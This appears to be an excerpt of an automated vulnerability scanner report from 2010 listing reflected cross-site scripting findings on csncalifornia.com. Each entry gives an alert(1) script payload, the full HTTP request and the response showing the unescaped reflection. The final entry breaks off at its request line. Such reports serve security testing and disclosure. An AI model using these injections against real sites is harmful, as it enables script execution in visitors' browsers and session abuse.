GET /12/17bf117"><script>alert(1)</script>047b6a36e86/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html HTTP/1.1 Host: www.csncalifornia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:53 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:53 GMT Connection: close Connection: Transfer-Encoding Content-Length: 40228
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12/17bf117"><script>alert(1)</script>047b6a36e86/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f29e"><script>alert(1)</script>b330f4234e6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/17/102f29e"><script>alert(1)</script>b330f4234e6/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html HTTP/1.1 Host: www.csncalifornia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:55 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:55 GMT Connection: close Connection: Transfer-Encoding Content-Length: 40247
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12/17/102f29e"><script>alert(1)</script>b330f4234e6/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 306bd"><script>alert(1)</script>01f90018906 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/17/10/Urban-Renterias-comments-wrong-in-every-306bd"><script>alert(1)</script>01f90018906/landing_urban_v3.html HTTP/1.1 Host: www.csncalifornia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:56 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:56 GMT Connection: close Connection: Transfer-Encoding Content-Length: 40247
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12/17/10/Urban-Renterias-comments-wrong-in-every-306bd"><script>alert(1)</script>01f90018906/landing_urban_v3.html"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aed6b"><script>alert(1)</script>eaf8fc9806a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12aed6b"><script>alert(1)</script>eaf8fc9806a/17/10/bRaiders-Notes-and-Notables-bRaiders-to-/landing_notes_notables.html HTTP/1.1 Host: www.csncalifornia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:40 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:40 GMT Connection: close Connection: Transfer-Encoding Content-Length: 36723
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12aed6b"><script>alert(1)</script>eaf8fc9806a/17/10/bRaiders-Notes-and-Notables-bRaiders-to-/landing_notes_notables.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7208f"><script>alert(1)</script>e6c3848c98e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/177208f"><script>alert(1)</script>e6c3848c98e/10/bRaiders-Notes-and-Notables-bRaiders-to-/landing_notes_notables.html HTTP/1.1 Host: www.csncalifornia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:41 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:41 GMT Connection: close Connection: Transfer-Encoding Content-Length: 36704
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12/177208f"><script>alert(1)</script>e6c3848c98e/10/bRaiders-Notes-and-Notables-bRaiders-to-/landing_notes_notables.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f885"><script>alert(1)</script>01099a9e493 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/17/108f885"><script>alert(1)</script>01099a9e493/bRaiders-Notes-and-Notables-bRaiders-to-/landing_notes_notables.html HTTP/1.1 Host: www.csncalifornia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:42 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:42 GMT Connection: close Connection: Transfer-Encoding Content-Length: 36704
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12/17/108f885"><script>alert(1)</script>01099a9e493/bRaiders-Notes-and-Notables-bRaiders-to-/landing_notes_notables.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70abd"><script>alert(1)</script>780f195bb47 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/17/10/bRaiders-Notes-and-Notables-bRaiders-to-70abd"><script>alert(1)</script>780f195bb47/landing_notes_notables.html HTTP/1.1 Host: www.csncalifornia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:43 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:43 GMT Connection: close Connection: Transfer-Encoding Content-Length: 36704
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12/17/10/bRaiders-Notes-and-Notables-bRaiders-to-70abd"><script>alert(1)</script>780f195bb47/landing_notes_notables.html"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48591"><script>alert(1)</script>c1ce73c4869 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /1248591"><script>alert(1)</script>c1ce73c4869/17/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_kings.html HTTP/1.1 Host: www.csncalifornia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:53 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:53 GMT Connection: close Connection: Transfer-Encoding Content-Length: 53407
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/1248591"><script>alert(1)</script>c1ce73c4869/17/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_kings.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62c69"><script>alert(1)</script>a38fb92e8ce was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/1762c69"><script>alert(1)</script>a38fb92e8ce/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_kings.html HTTP/1.1 Host: www.csncalifornia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:54 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:54 GMT Connection: close Connection: Transfer-Encoding Content-Length: 53407
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12/1762c69"><script>alert(1)</script>a38fb92e8ce/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_kings.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89a75"><script>alert(1)</script>3146e5a4d51 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/17/1089a75"><script>alert(1)</script>3146e5a4d51/img-srchttpcsnbayareacomcommonglobal_ima/landing_kings.html HTTP/1.1 Host: www.csncalifornia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:57 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:57 GMT Connection: close Connection: Transfer-Encoding Content-Length: 53388
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12/17/1089a75"><script>alert(1)</script>3146e5a4d51/img-srchttpcsnbayareacomcommonglobal_ima/landing_kings.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea62d"><script>alert(1)</script>4f49a2ea5c9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/17/10/img-srchttpcsnbayareacomcommonglobal_imaea62d"><script>alert(1)</script>4f49a2ea5c9/landing_kings.html HTTP/1.1 Host: www.csncalifornia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:58 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:58 GMT Connection: close Connection: Transfer-Encoding Content-Length: 53407
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12/17/10/img-srchttpcsnbayareacomcommonglobal_imaea62d"><script>alert(1)</script>4f49a2ea5c9/landing_kings.html"> ...[SNIP]...
2.285. http://www.csncalifornia.com/12/17/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_kings.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b448"><script>alert(1)</script>5900ac44632 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/17/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_kings.html?5b448"><script>alert(1)</script>5900ac44632=1 HTTP/1.1 Host: www.csncalifornia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:51 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:51 GMT Connection: close Connection: Transfer-Encoding Content-Length: 53370
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <input type=hidden name="5b448"><script>alert(1)</script>5900ac44632" id = "5b448"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e362b"><script>alert(1)</script>0a797a8bec4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12e362b"><script>alert(1)</script>0a797a8bec4/17/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_niners.html HTTP/1.1 Host: www.csncalifornia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:02 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:02 GMT Connection: close Connection: Transfer-Encoding Content-Length: 56136
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12e362b"><script>alert(1)</script>0a797a8bec4/17/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_niners.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c56c"><script>alert(1)</script>220a7b4481e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/177c56c"><script>alert(1)</script>220a7b4481e/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_niners.html HTTP/1.1 Host: www.csncalifornia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:03 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:03 GMT Connection: close Connection: Transfer-Encoding Content-Length: 56155
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12/177c56c"><script>alert(1)</script>220a7b4481e/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_niners.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbf9a"><script>alert(1)</script>9fa4ced9eea was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/17/10dbf9a"><script>alert(1)</script>9fa4ced9eea/img-srchttpcsnbayareacomcommonglobal_ima/landing_niners.html HTTP/1.1 Host: www.csncalifornia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:04 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:04 GMT Connection: close Connection: Transfer-Encoding Content-Length: 56136
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12/17/10dbf9a"><script>alert(1)</script>9fa4ced9eea/img-srchttpcsnbayareacomcommonglobal_ima/landing_niners.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d49d7"><script>alert(1)</script>e38d6015248 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/17/10/img-srchttpcsnbayareacomcommonglobal_imad49d7"><script>alert(1)</script>e38d6015248/landing_niners.html HTTP/1.1 Host: www.csncalifornia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:06 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:06 GMT Connection: close Connection: Transfer-Encoding Content-Length: 56136
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12/17/10/img-srchttpcsnbayareacomcommonglobal_imad49d7"><script>alert(1)</script>e38d6015248/landing_niners.html"> ...[SNIP]...
2.290. http://www.csncalifornia.com/12/17/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_niners.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5dd1c"><script>alert(1)</script>15f5d0d33ee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/17/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_niners.html?5dd1c"><script>alert(1)</script>15f5d0d33ee=1 HTTP/1.1 Host: www.csncalifornia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:00 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:00 GMT Connection: close Connection: Transfer-Encoding Content-Length: 56118
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <input type=hidden name="5dd1c"><script>alert(1)</script>15f5d0d33ee" id = "5dd1c"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6869b"><script>alert(1)</script>000a9b1121d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /126869b"><script>alert(1)</script>000a9b1121d/17/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_ratto_v3.html HTTP/1.1 Host: www.csncalifornia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:45 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:45 GMT Connection: close Connection: Transfer-Encoding Content-Length: 35831
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/126869b"><script>alert(1)</script>000a9b1121d/17/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_ratto_v3.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd392"><script>alert(1)</script>4228a606950 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/17bd392"><script>alert(1)</script>4228a606950/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_ratto_v3.html HTTP/1.1 Host: www.csncalifornia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:46 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:46 GMT Connection: close Connection: Transfer-Encoding Content-Length: 35831
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12/17bd392"><script>alert(1)</script>4228a606950/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_ratto_v3.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c24c3"><script>alert(1)</script>c3d877227e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
